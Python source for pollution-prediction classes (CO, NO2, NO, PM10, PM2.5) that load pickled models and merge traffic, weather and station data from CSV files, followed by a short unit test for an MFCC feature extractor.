for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
# create list of week days represented by number(from 1 to 7) and add it to data
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
        # remove the no-longer-necessary date column from the initial data
        df=df.drop(['date'], axis=1)
        # load information about factory density in the city
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
        # add the factory density information to our data, joined on the season column
df=df.merge(factory_dencity, on='season')
#load information about traffic in the city during the seasons(months)
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
        # join the info above onto our data on the season column
df=df.merge(traffic_season_dencity, on='season')
#load information about traffic in the city during the day and week
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
        # join the info above onto our data on two columns: "time", "week_day"
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
        # load preprocessed information about temperature inversion in the city across the day, week, and seasons
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
        # join the info above onto our data on three columns: "time", "week_day", "season"
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
        # processing: take the mean of each inversion column and write it back to the column
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
        # load the information about wind in the city in general (the 253 m level)
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
        # join the info above onto our data on three columns: "time", "week_day", "season"
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
        # processing: take the mean of each wind column and write it back
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#adding building_density information
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
        # process geo station name info (get dummies)
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
        for i in range(geo_column.shape[0]):
            # compare strings by value ('==') rather than identity ('is')
            if df['station_name'][0] == geo_column.columns[i] and geo_column.iloc[i:i+1, i:i+1].iat[0, 0] == 1:
                geo_column = geo_column.iloc[i:i+1, :]
        geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
        # reorder the columns
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
        # reference statistics used to scale the output
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_CO = raw_data['CO'].median()
self.data_CO_std = np.std(raw_data['CO'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# a function based on our model
def predicted_output_category(self):
if (self.data is not None):
pred_outputs = self.reg.predict(self.data)
return pred_outputs
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['CO'] = ((self.data_mean_CO+ self.data_CO_std) * self.reg.predict_proba(self.data)[:,1]
+ (self.data_mean_CO- self.data_CO_std) * self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
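The month and day-of-week loops inside `load_and_clean_data` can equivalently be written with pandas' vectorized `.dt` accessor, which produces the same `season` (1..12) and `week_day` (1..7) columns without Python-level iteration. A minimal sketch with made-up dates:

```python
import pandas as pd

df = pd.DataFrame({'date': pd.to_datetime(['2021-01-04', '2021-06-13'])})
df['season'] = df['date'].dt.month            # month number, 1..12
df['week_day'] = df['date'].dt.dayofweek + 1  # 1 = Monday .. 7 = Sunday
```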
# create the special class for NO2 pollution that we are going to use from here on to predict new data
class polution_NO2_model():
    def __init__(self, model_file='model_NO2', scaler_file='scaler'):
        # read the saved 'model' and 'scaler' files; use the arguments (with the
        # original file names as defaults) instead of hard-coded paths
        with open(model_file, 'rb') as m_file, open(scaler_file, 'rb') as s_file:
            self.reg = pickle.load(m_file)
            self.scaler = pickle.load(s_file)
self.data = None
    # take a data file (*.csv) and preprocess it in the same way as above
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
        for i in range(geo_column.shape[0]):
            # compare strings by value ('==') rather than identity ('is')
            if df['station_name'][0] == geo_column.columns[i] and geo_column.iloc[i:i+1, i:i+1].iat[0, 0] == 1:
                geo_column = geo_column.iloc[i:i+1, :]
        geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_NO2 = raw_data['NO2'].median()
self.data_NO2_std = np.std(raw_data['NO2'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['NO2'] = ((self.data_mean_NO2+ self.data_NO2_std) * self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_NO2- self.data_NO2_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
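Each model class builds the full dummy matrix for the ten stations and then loops to keep the row matching the incoming station name. The same one-hot row can be built directly over the fixed station vocabulary; a minimal sketch, with 'marino' standing in for `df['station_name'][0]`:

```python
import pandas as pd

stations = ['shabalovka', 'turistskaya', 'spiridonovka', 'proletarski', 'marino',
            'koptevskii', 'glebovskaya', 'butlerova', 'anohina', 'ostankino']
current = 'marino'  # stand-in for the station name from the user data

# Single indicator row: 1 for the current station, 0 everywhere else.
geo_row = pd.DataFrame([{s: int(s == current) for s in stations}], columns=stations)
```

Building the row directly also avoids the string-comparison pitfalls of the loop-based selection.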
# create the special class for NO pollution that we are going to use from here on to predict new data
class polution_NO_model():
    def __init__(self, model_file='model_NO', scaler_file='scaler'):
        # read the saved 'model' and 'scaler' files; use the arguments (with the
        # original file names as defaults) instead of hard-coded paths
        with open(model_file, 'rb') as m_file, open(scaler_file, 'rb') as s_file:
            self.reg = pickle.load(m_file)
            self.scaler = pickle.load(s_file)
self.data = None
    # take a data file (*.csv) and preprocess it in the same way as above
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
        for i in range(geo_column.shape[0]):
            # compare strings by value ('==') rather than identity ('is')
            if df['station_name'][0] == geo_column.columns[i] and geo_column.iloc[i:i+1, i:i+1].iat[0, 0] == 1:
                geo_column = geo_column.iloc[i:i+1, :]
        geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_NO = raw_data['NO'].median()
self.data_NO_std = np.std(raw_data['NO'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['NO'] = ((self.data_mean_NO+ self.data_NO_std)* self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_NO- self.data_NO_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
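The output value in each `predicted_outputs()` is a probability-weighted blend: (median + std) weighted by P(class 1) plus (median - std) weighted by P(class 0), halved. Worked with made-up numbers:

```python
# Blend used by predicted_outputs(), with illustrative statistics.
median, std = 2.0, 0.5
p1 = 0.8          # predicted probability of the "high pollution" class
p0 = 1.0 - p1
value = ((median + std) * p1 + (median - std) * p0) / 2
# ((2.5 * 0.8) + (1.5 * 0.2)) / 2 = (2.0 + 0.3) / 2 = 1.15
```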
# create the special class for PM10 pollution that we are going to use from here on to predict new data
class polution_PM10_model():
    def __init__(self, model_file='model_PM10', scaler_file='scaler'):
        # read the saved 'model' and 'scaler' files; use the arguments (with the
        # original file names as defaults) instead of hard-coded paths
        with open(model_file, 'rb') as m_file, open(scaler_file, 'rb') as s_file:
            self.reg = pickle.load(m_file)
            self.scaler = pickle.load(s_file)
self.data = None
    # take a data file (*.csv) and preprocess it in the same way as above
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
##
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
        for i in range(geo_column.shape[0]):
            # compare strings by value ('==') rather than identity ('is')
            if df['station_name'][0] == geo_column.columns[i] and geo_column.iloc[i:i+1, i:i+1].iat[0, 0] == 1:
                geo_column = geo_column.iloc[i:i+1, :]
        geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_PM10 = raw_data['PM10'].median()
self.data_PM10_std = np.std(raw_data['PM10'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['PM10'] = ((self.data_mean_PM10+ self.data_PM10_std) * self.reg.predict_proba(self.data)[:,1]
+ (self.data_mean_PM10- self.data_PM10_std) * self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
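The repeated `pd.merge(..., on=["time","week_day"], how="inner")` calls perform an inner join on a composite key, so rows with no match in the lookup table are silently dropped. A minimal sketch with made-up values:

```python
import pandas as pd

left = pd.DataFrame({'time': [8, 8, 18],
                     'week_day': [1, 2, 1],
                     'station': ['a', 'b', 'c']})
right = pd.DataFrame({'time': [8, 18],
                      'week_day': [1, 1],
                      'traffic': [0.9, 0.7]})

# Inner join on two keys: row (8, 2) has no match and disappears.
merged = pd.merge(left, right, on=['time', 'week_day'], how='inner', sort=False)
```

That silent dropping is why the classes slice with `df.iloc[:1, :]` afterward: only the surviving matched row is carried forward.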
# create the special class for PM2.5 pollution that we are going to use from here on to predict new data
class polution_PM25_model():
    def __init__(self, model_file='model_PM25', scaler_file='scaler'):
        # read the saved 'model' and 'scaler' files; use the arguments (with the
        # original file names as defaults) instead of hard-coded paths
        with open(model_file, 'rb') as m_file, open(scaler_file, 'rb') as s_file:
            self.reg = pickle.load(m_file)
            self.scaler = pickle.load(s_file)
self.data = None
    # take a data file (*.csv) and preprocess it in the same way as above
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_PM25 = raw_data['PM2.5'].median()
self.data_PM25_std = np.std(raw_data['PM2.5'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['PM2.5'] = ((self.data_mean_PM25+ self.data_PM25_std) * self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_PM25- self.data_PM25_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
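The constructor above reloads a pickled classifier and scaler in a single `with` statement, and `predicted_outputs()` then combines the two class probabilities with the (median ± std) PM2.5 levels. A minimal, self-contained sketch of both patterns; the file paths, parameter dicts, and the numbers `median=50.0`, `std=10.0`, `p0=0.2`, `p1=0.8` are hypothetical stand-ins, not values from the real `model_PM25`/`scaler` files:

```python
import os
import pickle
import tempfile

# hypothetical stand-ins for the persisted objects: coefficients for the
# "model" and per-feature statistics for the "scaler"
model_params = {'coef': [0.4, -0.2], 'intercept': 0.1}
scaler_params = {'mean': [10.0, 3.0], 'std': [2.0, 1.0]}

workdir = tempfile.mkdtemp()
model_path = os.path.join(workdir, 'model_PM25')
scaler_path = os.path.join(workdir, 'scaler')
with open(model_path, 'wb') as f:
    pickle.dump(model_params, f)
with open(scaler_path, 'wb') as f:
    pickle.dump(scaler_params, f)

# reload both objects in one statement, as the constructor does
with open(model_path, 'rb') as model_file, open(scaler_path, 'rb') as scaler_file:
    reg = pickle.load(model_file)
    scaler = pickle.load(scaler_file)

# the PM2.5 estimate in predicted_outputs(), with hypothetical numbers:
median, std = 50.0, 10.0   # assumed PM2.5 median and standard deviation
p0, p1 = 0.2, 0.8          # assumed class probabilities (sum to 1)
pm25 = ((median + std) * p1 + (median - std) * p0) / 2
print(pm25)  # -> 28.0, i.e. (60 * 0.8 + 40 * 0.2) / 2
```

The round trip relies only on `pickle` preserving plain Python containers, so the same two-file layout works for any picklable model and scaler objects.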
| 44.523353 | 133 | 0.569492 | 4,424 | 37,177 | 4.56736 | 0.063517 | 0.030486 | 0.017816 | 0.018806 | 0.905622 | 0.900723 | 0.895922 | 0.888647 | 0.884787 | 0.881471 | 0 | 0.020999 | 0.309573 | 37,177 | 834 | 134 | 44.576739 | 0.766207 | 0.134088 | 0 | 0.886831 | 0 | 0 | 0.17467 | 0.017785 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0 | 0.012346 | 0 | 0.100823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0c397509484560ec4b6b37513d3d068f6990fa7b | 7,823 | py | Python | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | """ Unit tests for FeatureExtractor """
import nose.tools
import sys
import numpy
sys.path.append('..')
from nose.tools import *
from dcase_framework.features import FeatureExtractor
from dcase_framework.utils import posix_path
import os
import tempfile


def test_extract():
    # MFCC
    extractor_name = 'mfcc'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mfcc': {
                'n_mfcc': 12
            }
        }
    )
    nose.tools.eq_(len(feature_repository), 1)
    nose.tools.assert_list_equal(sorted(list(feature_repository.keys())), [extractor_name])

    # Meta
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
    nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mfcc'], 12)

    # Stat
    nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])

    # Feat
    # Shape
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
